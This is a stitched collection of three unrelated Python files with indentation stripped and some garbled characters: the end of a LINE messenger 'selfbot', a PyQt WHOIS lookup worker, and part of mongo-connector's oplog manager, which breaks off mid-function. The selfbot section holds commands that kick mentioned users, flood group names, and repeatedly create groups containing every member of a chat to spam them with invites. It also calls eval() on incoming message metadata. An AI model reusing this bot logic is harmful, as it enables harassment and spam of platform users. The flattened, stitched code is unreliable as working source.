source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "album" in msg.text:
if msg.from_ in admin or owner:
try:
albumtags = msg.text.replace("album","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecâ†â�1�7�1�71¤7 1�71¤7" in msg.text:
if msg.from_ in admin or owner:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecâ†â�1�7�1�71¤7 1�71¤7","")
cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif "ranita cium " in msg.text:
if msg.from_ in admin or owner or mid:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["ranita glist"]: #Melihat List Group
if msg.from_ in owner:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["ranita glist2"]:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif "ranita asupka " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("barby asupka ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
cl.sendText(msg.to,"succes di invite boss, silahkan masuk...!!")
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
elif "ranita bye" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif "ranita megs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("ranita megs ","")
ap = cl.getGroups([msg.to])
semua = [contact.mid for contact in ap[0].members]
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
elif "#rmegs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("#rmegs ","")
ap = cl.getGroups([msg.to])
                semua = [contact.mid for contact in ap[0].members]  # collect the current member mids
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
klis=[cl]
team=random.choice(klis)
cl.findAndAddContactsByMid(Mi_d)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
team.findAndAddContactsByMid(Mi_d)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
elif "Rrecover" in msg.text:
if msg.from_ in owner:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Rrecover", mi_d)
cl.sendText(msg.to,"Success recover")
elif "ranita spin" in msg.text:
if msg.from_ in owner:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.sendText(msg.to,"Success...!!!!")
elif msg.text in ["Remove all chat"]:
if msg.from_ in owner:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat Finish")
elif msg.text in ["ranita muach"]:
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
cl.sendMessage(msg)
elif msg.text in ["ranita","Ranita"]:
if msg.from_ in owner:
cl.sendText(msg.to,"Ranita masih aktif Yank...!!!")
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n-> " + Nama
wait2['ROM'][op.param1][op.param2] = "-> " + Nama
                        wait2['setTime'][op.param1] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
    if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
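# nameUpdate(): background thread that, while wait["clock"] is enabled, refreshes the display name with the current time roughly every ten minutes.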
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
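# Main long-poll loop: fetch pending operations, hand each one to bot(), and advance the stored revision so operations are not replayed.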
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
whois_worker.py
|
from PyQt5.QtCore import QThread, pyqtSignal
from tqdm import tqdm
from time import sleep
import os
import whois # pip install whois
import multiprocessing as mp
from domainhelper import DomainHelper
class WhoisWorker(QThread):
def __init__(self, mail_objects):
super().__init__()
self.progress_reporter = WhoisProgressReporter()
self.mail_objects = mail_objects
def run(self):
PROCESSES = 8
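        # Producer/consumer layout: unique domains are queued once, worker processes fill a Manager-backed cache with WHOIS results, and the reporter thread relays progress counts to the GUI.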
with mp.Manager() as manager:
queue = mp.Queue()
whois_cache = manager.dict()
domain_counter = mp.Value('i', 0)
domain_set = set()
for mail in self.mail_objects:
for domain in mail.collect_domains():
domain_set.add(domain)
for domain in domain_set:
queue.put(domain)
domain_counter.value += 1
del (domain_set)
done_counter = mp.Value('i', 0)
self.progress_reporter.done_counter = done_counter
self.progress_reporter.domain_counter = domain_counter
p0 = self.progress_reporter
worker = []
for i in range(PROCESSES):
wProcess = mp.Process(target=parallel_whois_worker, args=(queue, whois_cache, done_counter))
worker.append(wProcess)
for w in worker:
w.start()
p0.start()
# for w in worker:
# w.join()
while not queue.empty():
sleep(10)
print("Whois complete")
sleep(10)
for w in worker:
w.terminate()
p0.terminate()
print("Whois done")
DomainHelper().whois_cache = dict(whois_cache)
del (whois_cache)
for mail in tqdm(self.mail_objects, unit=" E-Mails"):
mail.fill_whois_fields()
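# Worker process body: drain the shared queue, look up each domain at most once (results are cached in whois_cache), and bump the shared done counter.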
def parallel_whois_worker(domain_queue, whois_cache, done_counter):
while True:
if domain_queue.empty():
break
try:
domain = domain_queue.get()
if whois_cache.get(domain) is None:
entry = whois_request(domain)
whois_cache[domain] = entry
with done_counter.get_lock():
done_counter.value += 1
except:
break
def whois_request(domain):
    """Returns relevant whois data for given domain."""
    try:
        w = whois.query(domain).__dict__
domainEntry = {
"country": w.get('registrant_country'),
"organization": w.get('org'),
"holderName": w.get('name'),
"holderAddr": w.get('address')
}
return domainEntry
except:
domainEntry = {
"country": "WHOIS REQUEST FAILED",
"organization": "WHOIS REQUEST FAILED",
"holderName": "WHOIS REQUEST FAILED",
"holderAddr": "WHOIS REQUEST FAILED"
}
return domainEntry
class WhoisProgressReporter(QThread):
_pbar_val_signal = pyqtSignal(int)
_pbar_val_update_signal = pyqtSignal(int)
_pbar_init_signal = pyqtSignal(str, str, int)
_pbar_finished_signal = pyqtSignal()
def __init__(self):
super().__init__()
self.domain_counter = None
self.done_counter = None
def run(self):
self._pbar_init_signal.emit("WHOIS", "Domains", self.domain_counter.value)
with tqdm(total=self.domain_counter.value, unit=" Domains") as pbar:
while True:
with self.done_counter.get_lock():
pbar.update(self.done_counter.value)
self._pbar_val_update_signal.emit(self.done_counter.value)
self.done_counter.value = 0
sleep(2)
|
oplog_manager.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import sys
import time
import threading
import pymongo
from pymongo import CursorType, errors as pymongo_errors
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
import mongo_connector.plugin_manager as PluginManager
LOG = logging.getLogger(__name__)
class ReplicationLagLogger(threading.Thread):
"""Thread that periodically logs the current replication lag.
"""
def __init__(self, opman, interval):
super(ReplicationLagLogger, self).__init__()
self.opman = opman
self.interval = interval
self.daemon = True
def log_replication_lag(self):
checkpoint = self.opman.checkpoint
if checkpoint is None:
return
newest_write = retry_until_ok(self.opman.get_last_oplog_timestamp)
if newest_write < checkpoint:
# OplogThread will perform a rollback, don't log anything
return
lag_secs = newest_write.time - checkpoint.time
if lag_secs > 0:
LOG.info("OplogThread for replica set '%s' is %s seconds behind "
"the oplog.",
self.opman.replset_name, lag_secs)
else:
lag_inc = newest_write.inc - checkpoint.inc
if lag_inc > 0:
LOG.info("OplogThread for replica set '%s' is %s entries "
"behind the oplog.",
self.opman.replset_name, lag_inc)
else:
LOG.info("OplogThread for replica set '%s' is up to date "
"with the oplog.",
self.opman.replset_name)
def run(self):
while self.opman.is_alive():
self.log_replication_lag()
time.sleep(self.interval)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(self, primary_client, doc_managers,
oplog_progress_dict, namespace_config,
mongos_client=None, **kwargs):
super(OplogThread, self).__init__()
self.batch_size = kwargs.get('batch_size', DEFAULT_BATCH_SIZE)
# The connection to the primary for this replicaSet.
self.primary_client = primary_client
# The connection to the mongos, if there is one.
self.mongos_client = mongos_client
# Are we allowed to perform a collection dump?
self.collection_dump = kwargs.get('collection_dump', True)
# The document manager for each target system.
# These are the same for all threads.
self.doc_managers = doc_managers
# Boolean describing whether or not the thread is running.
self.running = True
# Stores the timestamp of the last oplog entry read.
self.checkpoint = None
# A dictionary that stores OplogThread/timestamp pairs.
# Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
# The namespace configuration
self.namespace_config = namespace_config
# Whether the collection dump gracefully handles exceptions
self.continue_on_error = kwargs.get('continue_on_error', False)
LOG.info('OplogThread: Initializing oplog thread')
self.oplog = self.primary_client.local.oplog.rs
self.replset_name = (
self.primary_client.admin.command('ismaster')['setName'])
if not self.oplog.find_one():
err_msg = 'OplogThread: No oplog for thread:'
LOG.warning('%s %s' % (err_msg, self.primary_client))
def _should_skip_entry(self, entry):
"""Determine if this oplog entry should be skipped.
This has the possible side effect of modifying the entry's namespace
and filtering fields from updates and inserts.
"""
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
return True, False
# Ignore no-ops
if entry['op'] == 'n':
return True, False
ns = entry['ns']
if '.' not in ns:
return True, False
coll = ns.split('.', 1)[1]
# Ignore system collections
if coll.startswith("system."):
return True, False
# Ignore GridFS chunks
if coll.endswith('.chunks'):
return True, False
is_gridfs_file = False
if coll.endswith(".files"):
ns = ns[:-len(".files")]
if self.namespace_config.gridfs_namespace(ns):
is_gridfs_file = True
else:
return True, False
# Commands should not be ignored, filtered, or renamed. Renaming is
# handled by the DocManagers via the CommandHelper class.
if coll == "$cmd":
return False, False
# Rename or filter out namespaces that are ignored keeping
# included gridfs namespaces.
namespace = self.namespace_config.lookup(ns)
if namespace is None:
LOG.debug("OplogThread: Skipping oplog entry: "
"'%s' is not in the namespace configuration." % (ns,))
return True, False
# Update the namespace.
entry['ns'] = namespace.dest_name
# Take fields out of the oplog entry that shouldn't be replicated.
# This may nullify the document if there's nothing to do.
if not self.filter_oplog_entry(
entry, include_fields=namespace.include_fields,
exclude_fields=namespace.exclude_fields):
return True, False
return False, is_gridfs_file
@log_fatal_exceptions
def run(self):
"""Start the oplog worker.
"""
ReplicationLagLogger(self, 30).start()
LOG.debug("OplogThread: Run thread started")
while self.running is True:
LOG.debug("OplogThread: Getting cursor")
cursor, cursor_empty = retry_until_ok(self.init_cursor)
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
continue
if cursor_empty:
LOG.debug("OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping.")
time.sleep(1)
continue
last_ts = None
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
LOG.debug("OplogThread: about to process new oplog entries")
while cursor.alive and self.running:
LOG.debug("OplogThread: Cursor is still"
" alive and thread is still running.")
for n, entry in enumerate(cursor):
# Break out if this thread should stop
if not self.running:
break
LOG.debug("OplogThread: Iterating through cursor,"
" document number in this cursor is %d"
% n)
skip, is_gridfs_file = self._should_skip_entry(entry)
if skip:
# update the last_ts on skipped entries to ensure
# our checkpoint does not fall off the oplog. This
# also prevents reprocessing skipped entries.
last_ts = entry['ts']
continue
# Sync the current oplog operation
operation = entry['op']
ns = entry['ns']
configs = self.namespace_config.get_plugin_configs(ns)
plugins = PluginManager.resolve(configs)
passthru_op = PluginManager.docs_index_needed(configs)
timestamp = util.bson_ts_to_long(entry['ts'])
for docman in self.doc_managers:
try:
LOG.debug("OplogThread: Operation for this "
"entry is %s" % str(operation))
if len(configs) > 0 and len(plugins) > 0:
LOG.debug("OplogThread: invoking "
"plugins for op %s entry %r",
operation, entry['o'])
self.invoke_plugins_for_doc(operation,
entry['o'], plugins, docman)
if not passthru_op:
continue
# Remove
if operation == 'd':
docman.remove(
entry['o']['_id'], ns, timestamp)
remove_inc += 1
# Insert
elif operation == 'i': # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get('o')
# Extract timestamp and namespace
if is_gridfs_file:
db, coll = ns.split('.', 1)
gridfile = GridFSFile(
self.primary_client[db][coll],
doc)
docman.insert_file(
gridfile, ns, timestamp)
else:
docman.upsert(doc, ns, timestamp)
upsert_inc += 1
# Update
elif operation == 'u':
docman.update(entry['o2']['_id'],
entry['o'],
ns, timestamp)
update_inc += 1
# Command
elif operation == 'c':
# use unmapped namespace
doc = entry.get('o')
docman.handle_command(doc,
entry['ns'],
timestamp)
except errors.OperationFailed:
LOG.exception(
"Unable to process oplog document %r"
% entry)
except errors.ConnectionFailed:
LOG.exception(
"Connection failed while processing oplog "
"document %r" % entry)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
LOG.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far" % (
remove_inc, upsert_inc, update_inc))
LOG.debug("OplogThread: Doc is processed.")
last_ts = entry['ts']
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1:
self.update_checkpoint(last_ts)
last_ts = None
# update timestamp after running through oplog
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after "
"processing new oplog entries")
self.update_checkpoint(last_ts)
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
LOG.exception(
"Cursor closed due to an exception. "
"Will attempt to reconnect.")
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread.")
self.update_checkpoint(last_ts)
LOG.debug("OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d"
% (remove_inc, upsert_inc, update_inc))
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
LOG.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
@classmethod
def _find_field(cls, field, doc):
"""Find the field in the document which matches the given field.
The field may be in dot notation, eg "a.b.c". Returns a list with
a single tuple (path, field_value) or the empty list if the field
is not present.
"""
path = field.split('.')
try:
for key in path:
doc = doc[key]
return [(path, doc)]
except (KeyError, TypeError):
return []
@classmethod
def _find_update_fields(cls, field, doc):
"""Find the fields in the update document which match the given field.
Both the field and the top level keys in the doc may be in dot
notation, eg "a.b.c". Returns a list of tuples (path, field_value) or
the empty list if the field is not present.
"""
def find_partial_matches():
for key in doc:
if len(key) > len(field):
# Handle case where field is a prefix of key, eg field is
# 'a' and key is 'a.b'.
if key.startswith(field) and key[len(field)] == '.':
yield [key], doc[key]
# Continue searching, there may be multiple matches.
# For example, field 'a' should match 'a.b' and 'a.c'.
elif len(key) < len(field):
# Handle case where key is a prefix of field, eg field is
# 'a.b' and key is 'a'.
if field.startswith(key) and field[len(key)] == '.':
# Search for the remaining part of the field
matched = cls._find_field(field[len(key) + 1:],
doc[key])
if matched:
# Add the top level key to the path.
match = matched[0]
match[0].insert(0, key)
yield match
# Stop searching, it's not possible for any other
# keys in the update doc to match this field.
return
try:
return [([field], doc[field])]
except KeyError:
# Field does not exactly match any key in the update doc.
return list(find_partial_matches())
def _pop_excluded_fields(self, doc, exclude_fields, update=False):
# Remove all the fields that were passed in exclude_fields.
find_fields = self._find_update_fields if update else self._find_field
for field in exclude_fields:
for path, _ in find_fields(field, doc):
# Delete each matching field in the original document.
temp_doc = doc
for p in path[:-1]:
temp_doc = temp_doc[p]
temp_doc.pop(path[-1])
return doc # Need this to be similar to copy_included_fields.
def _copy_included_fields(self, doc, include_fields, update=False):
new_doc = {}
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# Copy each matching field in the original document.
temp_doc = new_doc
for p in path[:-1]:
temp_doc = temp_doc.setdefault(p, {})
temp_doc[path[-1]] = value
return new_doc
def filter_oplog_entry(self, entry, include_fields=None,
exclude_fields=None):
"""Remove fields from an oplog entry that should not be replicated.
NOTE: this does not support array indexing, for example 'a.b.2'"""
if not include_fields and not exclude_fields:
return entry
elif include_fields:
filter_fields = self._copy_included_fields
else:
filter_fields = self._pop_excluded_fields
fields = include_fields or exclude_fields
entry_o = entry['o']
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
entry['o'] = filter_fields(entry_o, fields)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry['op'] == 'u' and ('$set' in entry_o or '$unset' in entry_o):
if '$set' in entry_o:
entry['o']["$set"] = filter_fields(
entry_o["$set"], fields, update=True)
if '$unset' in entry_o:
entry['o']["$unset"] = filter_fields(
entry_o["$unset"], fields, update=True)
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o['$set']:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o['$unset']:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry['op'] == 'u':
entry['o'] = filter_fields(entry_o, fields)
return entry
def get_oplog_cursor(self, timestamp=None):
"""Get a cursor to the oplog after the given timestamp, excluding
no-op entries.
If no timestamp is specified, returns a cursor to the entire oplog.
"""
query = {'op': {'$ne': 'n'}}
if timestamp is None:
cursor = self.oplog.find(
query,
cursor_type=CursorType.TAILABLE_AWAIT)
else:
query['ts'] = {'$gte': timestamp}
cursor = self.oplog.find(
query,
cursor_type=CursorType.TAILABLE_AWAIT,
oplog_replay=True)
return cursor
def get_collection(self, namespace):
"""Get a pymongo collection from a namespace."""
database, coll = namespace.split('.', 1)
return self.primary_client[database][coll]
def invoke_plugins_for_doc(self, operation, doc, plugins, dm):
"""Invoke all the plugins on a document event/operation.
"""
failures = 0
for plugin in plugins:
try:
LOG.debug('plugin invoke with %r', plugin)
if plugin.invoke(operation, doc, dm) is None:
failures += 1
except Exception:
if self.continue_on_error:
LOG.exception("Could not invoke plugin %s on doc: %r" %
(plugin.name(), doc))
failures += 1
else:
raise
return failures
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
# Flag if this oplog thread was cancelled during the collection dump.
# Use a list to workaround python scoping.
dump_cancelled = [False]
def get_all_ns():
ns_set = []
gridfs_ns_set = []
db_list = self.namespace_config.get_included_databases()
if not db_list:
# Only use listDatabases when the configured databases are not
# explicit.
db_list = retry_until_ok(self.primary_client.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.primary_client[database].collection_names)
for coll in coll_list:
# ignore system collections
if coll.startswith("system."):
continue
# ignore gridfs chunks collections
if coll.endswith(".chunks"):
continue
if coll.endswith(".files"):
namespace = "%s.%s" % (database, coll)
namespace = namespace[:-len(".files")]
if self.namespace_config.gridfs_namespace(namespace):
gridfs_ns_set.append(namespace)
else:
namespace = "%s.%s" % (database, coll)
if self.namespace_config.map_namespace(namespace):
ns_set.append(namespace)
return ns_set, gridfs_ns_set
dump_set, gridfs_dump_set = get_all_ns()
LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)
def docs_to_dump(from_coll):
last_id = None
attempts = 0
projection = self.namespace_config.projection(from_coll.full_name)
# Loop to handle possible AutoReconnect
while attempts < 60:
if last_id is None:
cursor = retry_until_ok(
from_coll.find,
projection=projection,
sort=[("_id", pymongo.ASCENDING)]
)
else:
cursor = retry_until_ok(
from_coll.find,
{"_id": {"$gt": last_id}},
projection=projection,
sort=[("_id", pymongo.ASCENDING)]
)
try:
for doc in cursor:
if not self.running:
# Thread was joined while performing the
# collection dump.
dump_cancelled[0] = True
raise StopIteration
last_id = doc["_id"]
yield doc
break
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure):
attempts += 1
time.sleep(1)
def invoke_namespace_plugins(namespace, dm):
num_failed = 0
from_coll = self.get_collection(namespace)
mapped_ns = self.namespace_config.map_namespace(namespace)
total_docs = retry_until_ok(from_coll.count)
num = None
plugin_configs = self.namespace_config.get_plugin_configs(namespace)
plugins = PluginManager.resolve(plugin_configs)
# In order to update indexes, the inserts/prior updates need to
# be flushed out. Commit pending ops before invoking plugins.
dm.commit()
for num, doc in enumerate(docs_to_dump(from_coll)):
nperrs = self.invoke_plugins_for_doc('u', doc,plugins, dm)
if nperrs > 0:
num_failed += 1
if num % 10000 == 0:
LOG.info("Plugins invoked on %d out of approximately "
"%d docs from collection '%s'", num + 1,
total_docs, namespace)
if num_failed > 0:
LOG.error("Failed invoking plugins on %d docs", num_failed)
if num is not None:
LOG.info("Plugins invoked on %d out of approximately %d "
"docs from collection '%s'", num + 1, total_docs,
namespace)
def invoke_plugins(plugin_namespaces, dm):
for namespace in plugin_namespaces:
invoke_namespace_plugins(namespace, dm)
def upsert_each(dm):
num_failed = 0
namespaces_with_plugins = []
for namespace in dump_set:
LOG.debug("Checking if namespace %s has plugins",
namespace)
configs = self.namespace_config.get_plugin_configs(namespace)
if len(configs) > 0:
LOG.info("Adding namespace %s to ones with plugins",
namespace)
namespaces_with_plugins.append(namespace)
if not PluginManager.docs_index_needed(configs):
continue
from_coll = self.get_collection(namespace)
mapped_ns = self.namespace_config.map_namespace(namespace)
total_docs = retry_until_ok(from_coll.count)
num = None
for num, doc in enumerate(docs_to_dump(from_coll)):
try:
dm.upsert(doc, mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception(
"Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
if num % 10000 == 0:
LOG.info("Upserted %d out of approximately %d docs "
"from collection '%s'",
num + 1, total_docs, namespace)
if num is not None:
LOG.info("Upserted %d out of approximately %d docs from "
"collection '%s'",
num + 1, total_docs, namespace)
invoke_plugins(namespaces_with_plugins, dm)
if num_failed > 0:
LOG.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
namespaces_with_plugins = []
try:
for namespace in dump_set:
LOG.debug("Checking if namespace %s has any plugins",
namespace)
configs = self.namespace_config.get_plugin_configs(namespace)
if len(configs) > 0:
LOG.info("Adding %s to namespaces with plugins",
namespace)
namespaces_with_plugins.append(namespace)
if not PluginManager.docs_index_needed(configs):
continue
from_coll = self.get_collection(namespace)
total_docs = retry_until_ok(from_coll.count)
mapped_ns = self.namespace_config.map_namespace(
namespace)
LOG.info("Bulk upserting approximately %d docs from "
"collection '%s'",
total_docs, namespace)
dm.bulk_upsert(docs_to_dump(from_coll),
mapped_ns, long_ts)
invoke_plugins(namespaces_with_plugins, dm)
except Exception:
if self.continue_on_error:
LOG.exception("OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially")
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
LOG.debug("OplogThread: Using bulk upsert function for "
"collection dump")
upsert_all(dm)
if gridfs_dump_set:
LOG.info("OplogThread: dumping GridFS collections: %s",
gridfs_dump_set)
# Dump GridFS files
for gridfs_ns in gridfs_dump_set:
mongo_coll = self.get_collection(gridfs_ns)
from_coll = self.get_collection(gridfs_ns + '.files')
dest_ns = self.namespace_config.map_namespace(gridfs_ns)
for doc in docs_to_dump(from_coll):
gridfile = GridFSFile(mongo_coll, doc)
dm.insert_file(gridfile, dest_ns, long_ts)
except:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
LOG.critical('Exception during collection dump',
exc_info=errors.get_nowait())
dump_success = False
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
return None
if dump_cancelled[0]:
LOG.warning('Initial collection dump was interrupted. '
'Will re-run the collection dump on next startup.')
return None
return timestamp
def _get_oplog_timestamp(self, newest_entry):
"""Return the timestamp of the latest or earliest entry in the oplog.
"""
sort_order = pymongo.DESCENDING if newest_entry else pymongo.ASCENDING
curr = self.oplog.find({'op': {'$ne': 'n'}}).sort(
'$natural', sort_order
).limit(-1)
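        # Note: in PyMongo a negative limit returns at most that many
        # documents in a single batch and then closes the cursor, so
        # limit(-1) yields at most one (the newest/oldest non-noop) entry.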
try:
ts = next(curr)['ts']
except StopIteration:
LOG.debug("OplogThread: oplog is empty.")
return None
LOG.debug("OplogThread: %s oplog entry has timestamp %s."
% ('Newest' if newest_entry else 'Oldest', ts))
return ts
def get_oldest_oplog_timestamp(self):
"""Return the timestamp of the oldest entry in the oplog.
"""
return self._get_oplog_timestamp(False)
def get_last_oplog_timestamp(self):
"""Return the timestamp of the newest entry in the oplog.
"""
return self._get_oplog_timestamp(True)
def _cursor_empty(self, cursor):
try:
# Tailable cursors can not have singleBatch=True in MongoDB > 3.3
next(cursor.clone().remove_option(CursorType.TAILABLE_AWAIT)
.limit(-1))
return False
except StopIteration:
return True
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
Returns the cursor and True if the cursor is empty.
"""
timestamp = self.read_last_checkpoint()
if timestamp is None:
if self.collection_dump:
# dump collection and update checkpoint
timestamp = self.dump_collection()
self.update_checkpoint(timestamp)
if timestamp is None:
return None, True
else:
# Collection dump disabled:
# Return cursor to beginning of oplog but do not set the
# checkpoint. The checkpoint will be set after an operation
# has been applied.
cursor = self.get_oplog_cursor()
return cursor, self._cursor_empty(cursor)
cursor = self.get_oplog_cursor(timestamp)
cursor_empty = self._cursor_empty(cursor)
if cursor_empty:
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor")
self.update_checkpoint(self.rollback())
return self.init_cursor()
first_oplog_entry = next(cursor)
oldest_ts_long = util.bson_ts_to_long(
self.get_oldest_oplog_timestamp())
checkpoint_ts_long = util.bson_ts_to_long(timestamp)
